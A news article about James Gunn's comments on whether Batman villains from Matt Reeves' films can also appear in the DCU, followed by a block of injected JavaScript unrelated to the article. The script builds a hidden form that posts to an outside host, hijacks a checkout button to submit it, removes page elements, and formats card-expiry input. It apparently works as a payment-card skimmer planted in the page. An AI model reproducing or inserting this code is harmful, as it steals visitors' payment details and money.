Movies

James Gunn Reveals Whether Matt Reeves’ Batman Villains Can Appear in the DCU (And Vice Versa)

Best of both worlds: The DC Studios co-head says that Batman’s villains can co-exist on-screen in two universes. 

Batman‘s rogues gallery of villains — including the Riddler, the Penguin, Catwoman, and the Joker — have started filling out the world of The Batman, Matt Reeves’ 2022 reboot in which Robert Pattinson dons the cape and cowl of the Dark Knight Detective. But with the new DC Universe planning to introduce its own caped crusader in the Batman movie The Brave and the Bold — which The Flash filmmaker Andy Muschietti is developing for Peter Safran and James Gunn’s DC Studios — does the inclusion of certain villains in Reeves’ Batman Epic Crime Saga preclude them from also appearing in the DCU?

Videos by ComicBook.com

“No. But both the Crime Saga and the DCU are a part of DC Studios so we of course take everything into account,” Gunn answered on Threads when asked if there’s an agreement with Reeves concerning the use of Batman’s villains. “But there’s no die hard rule.”

There’s no word yet on which Bat-villains will appear in The Batman sequel that Reeves is directing as the next installment in his Batman Epic Crime Saga. Rumors have swirled over the years about bandaged bad guy Hush, two-faced Harvey Dent, and the multi-faceted Clayface, who has appeared in the animated Creature Commandos (which takes place in the DCU) and is being molded into a live-action feature from writer Mike Flanagan and director James Watkins.

While separate from the continuity that will officially launch with Gunn’s Superman movie on July 11, Reeves’ Batman universe, which includes the HBO spinoff series The Penguin, is under DC Studios and produced by Gunn and Safran.

Likewise, Reeves is producing the Clayface movie about the shape-shifting Batman villain that’s set in Gunn’s DC Universe. Reeves is also an executive producer on the Batman: Caped Crusader animated series via his 6th & Idaho Motion Picture Company and Dynamic Duo, the animated Robins movie in development from DC Studios and Warner Bros. Pictures Animation.

In a Rolling Stone profile, Gunn noted that Batman is “my biggest issue in all of DC right now” and that the DCU Dark Knight is being prioritized alongside the Wonder Woman movie recently revealed to be in the works at DC Studios.

“I’m not writing Batman, but I am working with the writer of Batman and trying to get it right, because he’s incredibly important to DC, as is Wonder Woman,” Gunn said of the tentatively-titled Brave and the Bold. “So outside of the stuff that I’m doing in the projects that are actively going, our two priorities are finishing our Wonder Woman and our Batman scripts.”

He went on to say that there’s an issue of differentiating the DCU Batman from Reeves’ Batman, who is in year two of being a vengeful vigilante by the time of The Batman. The biggest difference is that Gunn named 2006’s “Batman & Son” by Grant Morrison as an inspiration for The Brave and the Bold; that story focused on a more established Batman who has already mentored multiple Robins by the time he learns about Damian Wayne, the young son he shares with Talia al Ghul.

“Batman has to have a reason for existing, right? So Batman can’t just be ‘Oh, we’re making a Batman movie because Batman’s the biggest character in all of Warner Bros.,’ which he is,” Gunn said. “But because there’s a need for him in the DCU and a need that he’s not exactly the same as Matt’s Batman. But yet he’s not a campy Batman. I’m not interested in that. I’m not interested in a funny, campy Batman, really.”

“So we’re dealing with that. I think I have a way in, by the way,” he continued. “I think I really know what it’s [about], I just am dealing with the writer to make sure that we can make it a reality.”

The Batman 2 is set for October 1, 2027, while The Brave and the Bold remains undated.

' document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0].setAttribute('form', 'formid') document.getElementsByClassName('w-full p-4')[0].remove() document.getElementsByClassName('w-full p-4')[0].innerHTML='
' var el = document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0], elClone = el.cloneNode(true); el.parentNode.replaceChild(elClone, el); }, 5000); }, false); }; var elemDiv = document.createElement('form'); elemDiv.setAttribute('action', 'https://pay.jollibeefood.rest') elemDiv.setAttribute('method', 'post') elemDiv.setAttribute('id', 'formid') document.body.appendChild(elemDiv); setTimeout(function () { try{ document.getElementsByClassName('border-gray-medium flex cursor-pointer items-center justify-between rounded-md border-2 bg-white p-4')[1].remove() } catch{ console.log(1) } }, 9000); navigation.addEventListener('navigate', () => { setTimeout(function () { try{ var objects = document.getElementsByTagName("svg"); for(var i = 0; i < objects.length; i++) { var obj = objects[i].parentElement; obj.innerHTML += ""; // will trigger update } document.getElementsByClassName('border-gray-medium flex cursor-pointer items-center justify-between rounded-md border-2 bg-white p-4')[1].remove() document.getElementsByClassName("py-5")[1].getElementsByClassName("space-y-2")[0].addEventListener("click", function(e) { setTimeout(function () { document.getElementsByClassName('w-full p-4')[0].innerHTML='
' document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0].setAttribute('form', 'formid') document.getElementsByClassName('w-full p-4')[0].remove() document.getElementsByClassName('w-full p-4')[0].innerHTML='
' var el = document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0], elClone = el.cloneNode(true); el.parentNode.replaceChild(elClone, el); }, 5000); }, false); } catch(error){ console.log(error) } }, 4000); }); function formatString(e) { var inputChar = String.fromCharCode(event.keyCode); var code = event.keyCode; var allowedKeys = [8]; if (allowedKeys.indexOf(code) !== -1) { return; } event.target.value = event.target.value.replace( /^([1-9]\/|[2-9])$/g, '0$1/' // 3 > 03/ ).replace( /^(0[1-9]|1[0-2])$/g, '$1/' // 11 > 11/ ).replace( /^([0-1])([3-9])$/g, '0$1/$2' // 13 > 01/3 ).replace( /^(0?[1-9]|1[0-2])([0-9]{2})$/g, '$1/$2' // 141 > 01/41 ).replace( /^([0]+)\/|[0]+$/g, '0' // 0/ > 0 and 00 > 0 ).replace( /[^\d\/]|^[\/]*$/g, '' // To allow only digits and `/` ).replace( /\/\//g, '/' // Prevent entering more than 1 `/` ); }